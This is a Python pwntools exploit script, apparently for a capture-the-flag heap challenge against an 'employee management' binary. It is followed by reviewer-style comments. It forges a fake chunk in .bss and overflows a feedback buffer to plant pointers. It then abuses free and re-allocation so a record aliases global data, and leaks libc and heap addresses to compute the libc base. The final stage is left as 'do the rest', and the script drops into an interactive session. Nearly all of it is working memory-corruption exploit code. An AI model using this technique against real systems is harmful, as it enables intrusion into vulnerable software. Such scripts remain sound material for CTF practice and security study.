#!/usr/bin/env python3
from pwn import *
# Target binary.  The "_patched" suffix suggests a copy whose interpreter/RUNPATH
# were rewritten (pwninit-style) to pick up the libc/ld shipped next to it --
# presumably, not verifiable from this file.
exe = ELF("./company_patched")
# The libc build every hard-coded offset below (e.g. 0x22d780) was derived from;
# swapping this file invalidates those constants.
libc = ELF("./libc.so.6")
# Loaded for completeness only: `ld` is not referenced anywhere else in this file.
ld = ELF("./ld-linux-x86-64.so.2")
# Makes pwntools take arch/bits/endianness (and hence p64/u64 width) from the target.
context.binary = exe
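def conn():
    """Open the tube the rest of the script drives.

    With ``LOCAL`` on the pwntools command line the patched binary is started
    in-process with the bundled libc forced in via ``LD_PRELOAD``; ``DEBUG``
    additionally attaches gdb to it.  Otherwise a TCP connection is made to
    ``HOST``/``PORT`` (pwntools ``args``), falling back to the placeholder
    values that were previously hard-coded, so existing invocations behave
    exactly as before.

    Returns:
        A pwntools tube (``process`` or ``remote``).
    """
    if args.LOCAL:
        # LD_PRELOAD pins the exact libc build the offsets in this script were
        # computed against, even if the *_patched binary would already resolve
        # ./libc.so.6 on its own (presumably the case for a pwninit-patched copy).
        r = process(exe.path, env={"LD_PRELOAD": libc.path})
        if args.DEBUG:
            gdb.attach(r)
    else:
        # Missing pwntools args evaluate to "", so the `or` keeps the old
        # defaults while letting `HOST=... PORT=...` select a live instance
        # without editing the script.
        host = args.HOST or "addr"
        port = int(args.PORT or 1337)
        r = remote(host, port)
    return r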
def add_employee(ind, name, position, salary):
    """Menu option 1: create an employee record on the module-level tube ``p``.

    ``ind`` and ``salary`` are stringified; ``name`` and ``position`` are sent
    exactly as given (str or bytes) so raw payloads such as packed pointers can
    be placed in those fields.
    """
    exchange = (
        (">>", b"1"),
        ("Index:", str(ind)),
        ("Name:", name),
        ("Position:", position),
        ("Salary:", str(salary)),
    )
    for marker, payload in exchange:
        p.sendlineafter(marker, payload)
def fire_employee(ind):
    """Menu option 2: remove the employee stored at index ``ind``.

    Drives the module-level tube ``p``; returns nothing.
    """
    for marker, payload in ((">>", b"2"), ("Index:", str(ind))):
        p.sendlineafter(marker, payload)
def give_feedback(ind1, ind2, feedback):
    """Menu option 3: submit ``feedback`` from employee ``ind1`` about ``ind2``.

    ``feedback`` is forwarded unchanged so oversized or binary payloads can be
    sent.  Note the second index is matched on a bare ``"?"``: pwntools will
    fire on the first ``?`` that arrives after the ``"are?"`` prompt has been
    consumed, so any extra ``?`` in the program's output would desynchronise
    the exchange.
    """
    send = p.sendlineafter
    send(">>", b"3")
    send("are?", str(ind1))
    send("?", str(ind2))
    send("Feedback:", feedback)
def view_feedback(ind):
    """Menu option 4: ask the program to print the feedback for employee ``ind``.

    Only drives the menu on the module-level tube ``p``; the caller is
    responsible for reading the response (this is how the leaks are obtained).
    """
    steps = [(">>", b"4"), ("see?", str(ind))]
    for marker, payload in steps:
        p.sendlineafter(marker, payload)
# Address the corrupted record is expected to hand to free(): the user-data
# pointer of a chunk forged in .bss.  The word 0x61 sent on the "name" line
# below (0x60 | PREV_INUSE) must then sit at 0x404060 to act as its size
# field -- NOTE(review): that the name buffer starts at 0x404060 is inferred,
# confirm against the binary's .bss layout before reusing these constants.
to_free = 0x404070
p = conn()
# Forged chunk header: prev_size = 0, size = 0x61.  0x60 is presumably
# tcache-sized, so freeing to_free should be accepted without the stricter
# consistency checks applied to larger bins.
p.sendlineafter("name", p64(0) + p64(0x61))
# Three records.  Slot 0 carries "HR" in name and position; the re-add of
# slot 1 below also forces "HR" into the name, so this string presumably acts
# as a privilege marker -- not verifiable from this file.
add_employee(0, "HR", b"HR\0", 1234)
add_employee(1, "not HR", "not HR", 1234)
add_employee(2, "not HR", "not HR", 1234)
# 72 bytes of feedback from 0 to 1: presumably overruns the feedback buffer
# into record 1 so that each pointer-sized field there becomes to_free.
give_feedback(0, 1, p64(to_free)*9)
# Freeing record 1 therefore frees the forged .bss chunk ...
fire_employee(1)
# ... and the matching-size allocation that follows is served from it, so
# record 1 now lives at 0x404070 where its fields alias other globals.  The
# free/add pair is repeated to get controlled pointers into that record.
add_employee(1, "not HR", "not HR", 1234)
fire_employee(1)
# Name pads 0x10 bytes then "HR\0"; position is four .bss addresses and salary
# a fifth.  Which global each address is meant to alias (GOT entry, record
# table, the forged chunk itself) cannot be recovered from this file alone.
add_employee(1, "A"*0x10 + "HR\0", p64(0x404020) + p64(0x4040b0) + p64(0x404050) + p64(0x404070), 0x404058)
view_feedback(0)
# The libc leak is located by scanning for the first 0x7f byte (the sixth byte
# of a libc pointer under the usual x86-64 ASLR layout).  Fragile: any 0x7f
# in the preceding output, or a pointer whose sixth byte is not 0x7f,
# silently yields a wrong value.
libc_leak = u64(p.recvuntil("\x7f")[-6:] + b'\0\0')
view_feedback(3)
p.recvuntil("Feedback:")
# NOTE(review): recvline() stops at the first 0x0a and strip() removes any
# leading/trailing whitespace-valued bytes (0x09-0x0d, 0x20), so a heap
# pointer containing such a byte is truncated or shifted here.  Read a fixed
# byte count once the exact output framing is known.
heap_leak = u64(p.recvline().strip().ljust(8, b'\0'))
print(hex(libc_leak))
print(hex(heap_leak))
# Hard-coded leak-to-base offset; only valid for the bundled libc build.
# Prefer deriving it via libc.symbols[...] once the leaked symbol is named.
# libc.address is never assigned in this file, so libc.sym[...] would still
# return unrelocated offsets in the part still to be written.
libc_base = libc_leak - 0x22d780
# do the rest
p.interactive()